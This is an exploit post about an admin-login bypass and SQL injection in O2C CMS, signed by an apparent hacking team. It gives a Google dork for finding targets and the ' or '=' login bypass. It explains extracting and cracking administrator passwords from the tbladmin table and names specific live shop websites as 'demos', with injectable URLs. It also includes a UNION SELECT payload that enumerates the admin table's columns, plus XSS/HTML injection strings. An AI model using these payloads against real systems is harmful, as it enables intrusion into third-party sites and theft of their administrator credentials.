facebook facebook twitter rss

O2C cms admin bypass Vulnerability

Author: Rednofozi , Published: 20-07-2018
# From Title : O2C cms admin bypass Vulnerability
# To Title : O2C cms sql injection in administrator.
# by rednofozi
# Tested on: Windows, and many variations of linux.
# google dork: intext:"powered by O2C"


# Vulnerability

Now, previously reading up on exploits I came across the o2c cms admin bypass.
Login with: '=' 'or' and '=' 'or' as user and password.
Then go to any section, click on edit a field; And you will get something like this:
http://bandung-onlineshop.com/admin/category.php?act=edit&id=11'
http://www.endiraalda.com/admin/shop.php?act=edit&id=35'

# Error:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/endldcom/public_html/admin/modules/org.distributor.inc.php on line 298

# Review:

After successfully expoloiting the vulnerability, I come up with tbladmin in the database.
tbladmin contains the username and password for the administrator as you should well know.
When you get it? Crack the password, and you no longer have the need for '=' 'or' and '=' 'or'

# Demos:

http://www.endiraalda.com/admin/distributor.php?act=edit&id=39%27
http://bandung-onlineshop.com/admin/category.php?act=edit&id=11

# Other exploitable points in these sites:
SQL Injection: http://bandung-onlineshop.com/product.php?idc=11'
http://bandung-onlineshop.com/search.php (In search field, there is XSS & HTML Injection; Try putting this in it: <font color="red"><h1>@RapidDisclosure<img src="http://i59.tinypic.com/33ws84x.jpg"> )
HTML Injection/XSS & SQL Injection: http://www.endiraalda.com/product.php?view=%23&kat=-1%20and%201=2%20union%20all%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x74626c5f61646d696e--%20%3Cfont%20color=%22red%22%3E%3Cp+align%3D%22center%22%3E@RapidDisclosure%3C%2Fp%3E%3Cimg%20src=%22http://media.bestofmicro.com/J/K/399872/gallery/binary-eyes-shst-130906_w_500.jpg%22%3E

# Rednofozi iran cyber team welove sistan

Like us on Facebook :